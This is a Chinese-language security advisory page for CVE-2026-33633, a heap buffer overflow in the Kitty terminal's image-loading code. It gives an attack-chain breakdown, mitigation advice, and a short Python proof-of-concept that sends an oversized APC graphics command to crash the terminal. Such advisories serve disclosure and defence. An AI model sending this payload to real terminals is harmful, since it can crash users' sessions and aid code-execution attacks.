CVE-2026-33633 CVSS 7.5 高危

CVE-2026-33633 Kitty终端堆缓冲区溢出漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33633

漏洞类型

堆缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Kitty终端

漏洞概述

Kitty终端0.46.2及以下版本存在堆缓冲区溢出漏洞。攻击者通过向终端stdin发送特制的APC图形协议命令触发该漏洞。该命令声明PNG格式（f=100）并携带超长载荷，导致缓冲区溢出。成功利用可导致服务拒绝甚至远程代码执行。建议用户尽快升级到0.47.0版本以修复此问题。

技术细节

该漏洞位于Kitty终端的`load_image_data()`函数中，由于对APC图形协议命令的解析缺乏严格的边界检查。当终端接收到格式为f=100（PNG）的图像数据命令时，如果攻击者提供的载荷长度超过初始缓冲区分配大小的两倍，程序在拷贝数据时会发生堆缓冲区溢出。由于溢出数据的长度和内容完全由攻击者控制，这不仅会破坏堆内存结构导致崩溃，还可能被利用覆盖关键内存指针，从而实现任意代码执行。利用条件是攻击者需要有权限向目标终端的stdin写入数据。

攻击链分析

STEP 1

侦察

攻击者识别目标系统正在使用Kitty终端，且版本低于或等于0.46.2。

STEP 2

载荷构建

攻击者构建特定的APC图形协议命令，设置f=100（PNG格式），并填充超长载荷（超过缓冲区两倍容量）。

STEP 3

载荷投递

攻击者诱导用户在终端内执行恶意程序，或利用已控制的进程向终端的stdin写入构建好的恶意数据。

STEP 4

漏洞触发

Kitty终端解析该数据时，`load_image_data()`函数未能正确处理超长载荷，导致堆缓冲区溢出。

STEP 5

执行攻击

利用溢出覆盖内存，导致终端崩溃（DoS）或在特定条件下劫持执行流（RCE）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-33633
# This script generates a malicious APC graphics command to trigger the heap buffer overflow.
import sys

# Construct a large payload to exceed the buffer capacity
# The vulnerability is triggered when the payload exceeds 2x the initial buffer size
payload_size = 20000
malicious_payload = "A" * payload_size

# Build the APC graphics protocol command
# ESC _ G ... ESC \
# f=100 denotes PNG format
poc_command = f"\x1b_Gf=100;{malicious_payload}\x1b\\"

# Output the payload to the terminal's stdin
sys.stdout.write(poc_command)
sys.stdout.flush()

影响范围

Kitty终端 <= 0.46.2

防御指南

临时缓解措施

如果无法立即升级，应避免在Kitty终端中运行来源不明或不受信任的程序，防止恶意数据写入stdin。同时，可利用系统级沙箱或访问控制策略隔离终端进程。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表